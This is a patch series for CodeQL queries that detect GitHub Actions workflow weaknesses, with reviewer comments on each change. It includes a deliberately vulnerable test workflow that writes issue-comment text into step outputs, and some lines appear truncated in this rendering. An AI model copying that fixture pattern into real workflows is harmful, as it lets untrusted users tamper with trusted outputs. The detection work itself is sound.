insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index be0229a77c4b..fba33bb8bc87 100644 
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -242,7 +242,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run {
 GhMutableRefCheckout() {
 exists(string line |
 this.getScript().splitAt("\n") = line and
- line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
+ line.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and
 (
 (containsHeadRef(line) or containsPullRequestNumber(line))
 or

From da28f7dc0af47b59f6d0fe29116677e3d1ed3180 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 24 Jul 2024 15:56:47 +0200
Subject: [PATCH 424/707] feat(config): add asv to poisonable steps list

---
 ql/lib/ext/config/poisonable_steps.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index 7f07f696445c..1e0abb02d44d 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -16,6 +16,7 @@ extensions:
 # source: https://boostsecurityio.github.io/lotp/
 data:
 - ["ant"]
+ - ["asv"]
 - ["awk\\s+-f"]
 - ["bundle"]
 - ["cargo"]

From bb78bb6f570e6b335c0d25b2986a25c2302c0e81 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 24 Jul 2024 18:27:00 +0200
Subject: [PATCH 425/707] refactor(queries): update severity level for workflow permissions

---
 ql/src/Security/CWE-275/MissingActionsPermissions.ql | 2 +-
 ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
index 9373bf808e34..ffb217739c75 100644
--- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql
+++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql
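Review bot: The widened regex `.*(gh|hub)\\s+pr\\s+checkout.*` is still unbounded on the left, so any token that merely ends in `gh` or `hub` and is followed by `pr checkout` also matches; `.*\\b(gh|hub)\\s+pr\\s+checkout.*` keeps the intent without that slack. The class keeps the name `GhMutableRefCheckout` and, as far as the hunk shows, no QLDoc records that the legacy `hub` CLI is now covered; a comment such as `/** A `gh pr checkout` / `hub pr checkout` step that checks out a mutable pull-request ref. */` on the class would do that. The class header is only in the hunk context and the characteristic predicate continues past the hunk, so the full match condition is not visible here.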
@@ -3,7 +3,7 @@ * @description Workflows should contain permissions to provide a clear understanding has permissions to run the workflow. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/missing-workflow-permissions * @tags actions diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 58561ca6dba4..ecdb1d065263 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -3,7 +3,7 @@ * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. * @kind problem * @security-severity 5.0 - * @problem.severity warning + * @problem.severity recommendation * @precision high * @id actions/unpinned-tag * @tags security From ba6ab04dfca19cb6fbd6447e20ac8ad55b8b9ecb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:27:39 +0200 Subject: [PATCH 426/707] feat(suite): Remove severity:warning queries from CodeScanning suite --- ql/src/codeql-suites/actions-code-scanning.qls | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index d0fd74736ce7..801b22b0005c 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -8,12 +8,17 @@ tags contain: - security - maintainability + problem.severity: + - error + - recommendation - include: kind: - diagnostic - exclude: + problem.severity: + - warning tags contain: - experimental - testing From 28cc06e1361d34a35a1e10ccc89ca97547187fb9 Mon Sep 17 00:00:00 2001 
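Review bot: The subject line says "update severity level for workflow permissions", but the second hunk also downgrades `actions/unpinned-tag` from `warning` to `recommendation` while leaving `@security-severity 5.0` untouched; if both downgrades are deliberate, the subject should say so, e.g. `refactor(queries): downgrade missing-permissions and unpinned-tag to recommendation`. Note that, together with the suite change that follows in this series (which keeps only `error` and `recommendation` and excludes `warning`), this is effectively a promotion into the Code Scanning suite rather than a demotion, which is the opposite of what a reader infers from "warning → recommendation"; a one-line comment in each query header explaining that `recommendation` is the level the suite ships would avoid that confusion.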
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Jul 2024 18:28:09 +0200 Subject: [PATCH 427/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285ea6e16808..89923580de55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.23 +version: 0.1.24 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a51e583b32c4..776f51b17321 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.23 +version: 0.1.24 groups: [actions, queries] suites: codeql-suites extractor: javascript From eaf034e8cb02b8fd84d14f1ae5e4614ec336c3db Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 25 Jul 2024 11:09:02 +0200 Subject: [PATCH 428/707] feat(config): Add pipx as poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1e0abb02d44d..e2742fd60a7c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -40,6 +40,7 @@ extensions: - ["phpstan"] - ["pip\\s+install\\s+-r"] - ["pip\\s+install\\s+--requirement"] + - ["pipx\\s+install\\s+\\."] - ["poetry"] - ["pylint"] - ["pytest"] From e3df12d77bd3f4af9c7435d01cd13b39b639db0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:37:47 +0200 Subject: [PATCH 429/707] Update Query suite --- .../codeql-suites/actions-code-scanning.qls | 19 ++----------------- 1 file changed, 2 insertions(+), 17 deletions(-) diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index 801b22b0005c..ce3ff4893356 100644 
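Review bot: The new entry `pipx\\s+install\\s+\\.` only matches when the path immediately follows `install`, so the editable forms `pipx install -e .` and `pipx install --editable .`, which also build the checked-out project, are not treated as poisonable; consider `["pipx\\s+install\\s+(-e\\s+|--editable\\s+)?\\."]`. How these entries are matched (full line vs. substring) is not visible in this hunk, so check against the sibling `pip\\s+install\\s+-r` entries before widening further.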
--- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -1,26 +1,11 @@ - description: Standard Code Scanning queries for Actions -- queries: . - +- queries: '.' - include: - kind: - - problem - - path-problem - tags contain: - - security - - maintainability problem.severity: - error - recommendation - -- include: - kind: - - diagnostic - - exclude: - problem.severity: - - warning tags contain: - experimental - - testing - debug - - model-generator + From 06ec94e731dd0f4878e937e825345a4f4e5f3f65 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 29 Jul 2024 22:38:42 +0200 Subject: [PATCH 430/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89923580de55..395b875e1be5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.24 +version: 0.1.25 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 776f51b17321..290b58482bc4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.24 +version: 0.1.25 groups: [actions, queries] suites: codeql-suites extractor: javascript From da36924bb1098a89adcb425dc5532e966ca90ff2 Mon Sep 17 00:00:00 2001 
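Review bot: The rewrite drops `- testing` and `- model-generator` from the `exclude` list, so any query carrying those tags with `error`/`recommendation` severity now ships in the Code Scanning suite; unless that is intended, keep them: `- experimental`, `- testing`, `- debug`, `- model-generator`. Removing the `kind: diagnostic` include also means diagnostic queries, which carry no `problem.severity`, are no longer selected at all by the severity-only filter; if that is deliberate a comment such as `# diagnostics intentionally omitted from this suite` next to `- include:` would record it. The trailing blank `+` line can be dropped.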
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:26:41 +0200 Subject: [PATCH 431/707] feat(queries): Add Output Clobbering query --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../security/OutputClobberingQuery.qll | 101 ++++++++++++++---- .../Security/CWE-077/OutputClobberingHigh.ql | 37 +++++++ .../CWE-094/OutputClobberingMedium.ql | 31 ------ .../CWE-077/.github/workflows/output1.yml | 38 +++++++ .../CWE-077/OutputClobberingHigh.expected | 12 +++ .../CWE-077/OutputClobberingHigh.qlref | 1 + 7 files changed, 167 insertions(+), 55 deletions(-) create mode 100644 ql/src/Security/CWE-077/OutputClobberingHigh.ql delete mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e16bc00f8ea9..5d0d45c26c15 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -113,7 +113,7 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and ( - envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or envToArgInjSink(var_name, run, _) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index f1811ed57625..a67be6e35627 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -1,43 +1,98 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.security.CodeInjectionQuery private import codeql.actions.security.ArtifactPoisoningQuery -import codeql.actions.dataflow.FlowSources +private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow +import codeql.actions.dataflow.FlowSources -abstract class OutputClobberingSource extends Step { } +abstract class OutputClobberingSink extends DataFlow::Node { } -class RunOutputClobbering extends OutputClobberingSource, Run { - RunOutputClobbering() { - exists(UntrustedArtifactDownloadStep download, string script | - download.getAFollowingStep() = this and - this.getScript() = script and - exists(int i | - script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and - i < count(string line | line = script.splitAt("\n") | line) - 1 +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT + * echo "sha=$(> $GITHUB_OUTPUT + */ +class OutputClobberingFromFileReadSink extends OutputClobberingSink { + OutputClobberingFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string content, string key, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + ( + outputsPartialFileContent(value) + or + // e.g. 
+ // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_OUTPUT + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) ) ) } } /** - * A taint-tracking configuration for unsafe user input - * that is used to construct and evaluate a code script. + * Holds if a Run step declares an environment variable, uses it to declare env var. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "FOO=$BODY" >> $GITHUB_OUTPUT */ -private module OutputClobberingConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } +class OutputClobberingFromEnvVarSink extends OutputClobberingSink { + OutputClobberingFromEnvVarSink() { + exists(Run run, string var_name, string key | + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + // there is a different output variable in the same script + // TODO: key2/value2 should be declared before key/value + exists(string content2, string key2 | + writeToGitHubOutput(run, content2) and + extractVariableAndValue(content2, key2, _) and + not key2 = key + ) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +class OutputClobberingFromMaDSink extends OutputClobberingSink { + OutputClobberingFromMaDSink() { madSink(this, "output-clobbering") } +} - predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { - exists(StepsExpression e | - e.getTarget() = prev.asExpr() and - prev.asExpr() instanceof OutputClobberingSource and - 
succ.asExpr() = e - ) +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputClobberingSink } } -/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-077/OutputClobberingHigh.ql new file mode 100644 index 000000000000..a7016a50c58e --- /dev/null +++ b/ql/src/Security/CWE-077/OutputClobberingHigh.ql 
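Review bot: Both new sinks only require that some other output key exist anywhere in the same script (`not key2 = key`), and the two `TODO: key2/value2 should be declared before key/value` comments admit this is incomplete; if a later `key=value` line in `$GITHUB_OUTPUT` supersedes an earlier one, as the `# VULNERABLE` fixture (hardcoded `OUTPUT_1` first, tainted `OUTPUT_2` second) suggests, then a tainted write that precedes the trusted key cannot clobber it, so the ordering check is a real false-positive source and is worth resolving with the line index from `splitAt("\n", i)` rather than leaving as a TODO. The doc comments are copy-pasted from the env-var query and are wrong for this file: `Holds if a Run step declares an environment variable with contents from a local file` should read `Holds if a Run step writes a step output ($GITHUB_OUTPUT) whose value comes from a local file`, `declares an environment variable, uses it to declare env var` should read `writes a step output from an in-scope environment variable`, and the config/flow docs `construct and evaluate an environment variable` should say `construct a step output`. The example line `echo "sha=$(> $GITHUB_OUTPUT` also reads as truncated in this rendering (presumably `$(<test-results/sha-number)`).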
@@ -0,0 +1,37 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql deleted file mode 100644 index 7094a7891da1..000000000000 --- a/ql/src/Security/CWE-094/OutputClobberingMedium.ql +++ /dev/null 
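Review bot: The query is placed under `Security/CWE-077` but its tags list only `external/cwe/cwe-094`, `external/cwe/cwe-095` and `external/cwe/cwe-116`, so the directory and metadata disagree; either add `external/cwe/cwe-077` or move the file next to the other CWE-094 queries. It is also tagged `experimental`, which the Code Scanning suite introduced earlier in this series excludes, despite `@precision high` and `@problem.severity error`; if the query is meant to ship, drop the tag, otherwise a header note explaining why it is held back would help the next reader. The `@description` could name the mechanism the fixture exercises rather than just "can be clobbered", e.g. `An attacker-controlled value written to $GITHUB_OUTPUT after a trusted output can redefine that output.`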
@@ -1,31 +0,0 @@ -/** - * @name Output Clobbering - * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision medium - * @id actions/output-clobbering/medium - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.security.OutputClobberingQuery -import OutputClobberingFlow::PathGraph - -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink -where - OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - // exclude cases where the sink is a JS script and the expression uses toJson - not exists(UsesStep script | - script.getCallee() = "actions/github-script" and - script.getArgumentExpr("script") = sink.getNode().asExpr() and - exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) - ) -select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml new file mode 100644 index 000000000000..df5837249984 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml 
@@ -0,0 +1,38 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + - id: clob2 + run: | + echo ${{ steps.clob1.outputs.OUTPUT_1 }} + echo ${{ steps.clob1.outputs.OUTPUT_2 }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected new file mode 100644 index 000000000000..ea3261450eca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected 
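Review bot: `test3` downloads with `run_id: ${{ github.event.workflow_run.id }}` while the fixture's only trigger is `issue_comment`, where no `workflow_run` payload exists; add a `workflow_run:` trigger (with `workflows:` and `types: [completed]`) to `on:` so the fixture mirrors the real cross-workflow artifact pattern, or drop the `run_id` input. The final line `echo "OUTPUT_2=$(> $GITHUB_OUTPUT` reads as truncated in this rendering (presumably `$(<pr_number/...)`), and the same fragment appears in the `.expected` file, so it is worth confirming the committed fixture is intact. A `# VULNERABLE` / `# NOT VULNERABLE` marker on `test3` like the other two jobs carry would make the expected result self-explanatory.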
@@ -0,0 +1,12 @@ +edges +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +nodes +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. 
| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref new file mode 100644 index 000000000000..5af047eec9e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-077/OutputClobberingHigh.ql From f5261237a46cc27d3b474f5831813eff2de1081e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:27:28 +0200 Subject: [PATCH 432/707] feat(suites): Add a bughalla-specific query suite --- ql/src/codeql-suites/actions-bughalla.qls | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 ql/src/codeql-suites/actions-bughalla.qls diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/ql/src/codeql-suites/actions-bughalla.qls new file mode 100644 index 000000000000..0d718fac616e --- /dev/null +++ b/ql/src/codeql-suites/actions-bughalla.qls @@ -0,0 +1,6 @@ +- description: Bughalla queries for Actions +- queries: '.' +- exclude: + tags contain: + - debug + From bf10603b5fafdfe75c10c0d786c4aeb4eccb4078 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:28:15 +0200 Subject: [PATCH 433/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 395b875e1be5..7daf7247f259 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.25 +version: 0.1.26 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 290b58482bc4..b844148e7a21 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.25 +version: 0.1.26 groups: [actions, queries] suites: codeql-suites extractor: javascript From 65ad387543d2aba815f7aa4966e81b82c0868963 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:18:22 +0200 Subject: [PATCH 434/707] fix: Add printf as an equivalent to echo --- ql/lib/codeql/actions/Helper.qll | 22 +++++++++---------- .../security/EnvPathInjectionQuery.qll | 3 ++- .../actions/security/EnvVarInjectionQuery.qll | 3 ++- .../security/OutputClobberingQuery.qll | 3 ++- 4 files changed, 17 insertions(+), 14 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index b08b62c8a583..cd964a6621d7 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -74,7 +74,7 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 4)) and filters = "" and @@ -85,12 +85,12 @@ predicate singleLineFileWrite(string script, string cmd, string file, string con bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) 
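Review bot: Treating `printf` exactly like `echo` captures printf's whole argument list as `content`, but printf's first argument is a format string, so `printf '%s\n' "sha=$SHA" >> $GITHUB_OUTPUT` yields the content `'%s\n' "sha=$SHA"`, which `extractVariableAndValue` (whose parsing is outside this hunk) presumably does not split into a key and value; if that form is meant to be covered, strip a leading quoted format before extraction, otherwise note the limitation in a comment such as `// printf is matched like echo; the format-string form (printf '%s' "k=v") is not decoded`. The same applies to the `::set-output` and `::add-path` patterns in the second hunk. `singleLineFileWrite`'s body continues past the hunk.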
